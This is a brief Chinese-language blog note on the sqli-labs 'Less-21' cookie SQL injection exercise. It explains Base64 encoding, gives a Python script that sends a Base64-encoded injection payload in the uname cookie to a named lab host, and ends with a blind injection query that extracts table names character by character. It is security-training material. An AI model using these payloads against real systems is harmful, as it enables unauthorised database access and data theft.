Less-21

说是cookie注入。

  •  %3d urldecode =
  • Base64值为0就是A,为27的就是b。这样,每3个字符产生4位的Base64字符。如果被加密的字符串每3个一组,还剩1或2个字符,使用特殊字符"="补齐Base64的4字
  • https://base64.us/ 在线base64 网站

  1. # encoding utf-8
import base64
import requests as req
url ='https://sql.alienwares.top/Less-21/index.php'
str="admin') and 1=2#"
cookie=base64.b64encode(str.encode('utf-8'))
header={
    "User-Agent":"Mozilla/5.0 (Windows NT 10.0; WOW64; rv:60.0)Gecko/20100101 Firefox/60.0'",
    "Cookie":'uname='+cookie.decode('utf-8'),
}
res=req.get(url,headers=header)
# if('Delete Your Cookie' in res.content.decode('utf-8')):
#     print('succes')
#
# else:
#     print('error')
 
if('../images/slap1.jpg' in res.content.decode('utf-8')):
    print('error')
else:
    print('succes')
    View Code
  2. select mid((SELECT GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema=DATABASE()),1,1)='e'
【推广】 免费学中医,健康全家人
原文地址:https://www.cnblogs.com/hackering/p/14279029.html